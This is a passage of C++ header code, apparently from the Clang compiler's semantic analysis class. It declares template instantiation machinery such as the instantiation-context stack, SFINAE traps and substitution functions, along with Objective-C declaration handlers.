// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// These callbacks are used to print, trace, or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
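///
/// A minimal usage sketch (hypothetical values; \c I is the index of the
/// pack argument being substituted):
/// \code
///   {
///     Sema::ArgumentPackSubstitutionIndexRAII SubstIndex(S, I);
///     // substitutions here use the I'th argument of each expanded pack
///   } // the previous substitution index is restored automatically
/// \endcode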
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and isInvalid() returns true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
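///
/// A hedged usage sketch (names are illustrative):
/// \code
///   InstantiatingTemplate Inst(SemaRef, PointOfInstantiation, Entity);
///   if (Inst.isInvalid())
///     return; // depth limit exceeded; an error has already been emitted
///   // ... instantiate; the record is popped when Inst goes out of scope
/// \endcode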
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are substituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-null, points to the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
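///
/// A hedged sketch of a typical query (hypothetical caller):
/// \code
///   if (Optional<sema::TemplateDeductionInfo *> Info = isSFINAEContext()) {
///     // in a SFINAE context; *Info, when non-null, collects the
///     // diagnostics that would otherwise have been emitted
///   }
/// \endcode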
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
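///
/// A hedged usage sketch (hypothetical caller):
/// \code
///   SFINAETrap Trap(SemaRef);
///   // ... provisional checking that may produce SFINAE errors ...
///   if (Trap.hasErrorOccurred())
///     /* treat as a substitution failure rather than a hard error */;
/// \endcode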
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
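///
/// A hedged usage sketch (hypothetical caller):
/// \code
///   {
///     TentativeAnalysisScope Tentative(SemaRef);
///     // analyze provisionally; typo correction stays disabled in here
///   } // the previous typo-correction state is restored
/// \endcode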
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation);
/// however, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
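/// RAII scope that defers eagerly-triggered global instantiations: the
/// pending-instantiation queue and vtable uses are stashed on entry, drained
/// via perform(), and restored on exit. A hedged usage sketch (hypothetical
/// caller):
/// \code
///   GlobalEagerInstantiationScope GlobalInstantiations(S, /*Enabled=*/true);
///   // ... work that may enqueue instantiations or vtable uses ...
///   GlobalInstantiations.perform(); // must drain before the scope ends
/// \endcode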
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
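/// RAII scope for the local-instantiation queue above; a hedged usage
/// sketch (hypothetical caller):
/// \code
///   LocalEagerInstantiationScope LocalInstantiations(S);
///   // ... instantiate members of a local class in a template ...
///   LocalInstantiations.perform(); // drain local-only instantiations
/// \endcode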
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
/// A helper class for building up ExtParameterInfos.
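/// Indices must be set in increasing order; gaps are default-filled. A
/// minimal usage sketch (hypothetical values):
/// \code
///   ExtParameterInfoBuilder Builder;
///   Builder.set(I, Info); // record a non-default info for parameter I
///   if (const auto *Infos = Builder.getPointerOrNull(NumParams))
///     /* store Infos in the FunctionProtoType's ExtProtoInfo */;
/// \endcode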
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index.
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
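///
/// A hedged sketch of a typical call (names are illustrative):
/// \code
///   SmallVector<Expr *, 4> Outputs;
///   if (SubstExprs(Args, /*IsCall=*/true, TemplateArgs, Outputs))
///     return ExprError(); // substitution failed
/// \endcode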
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtoclLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
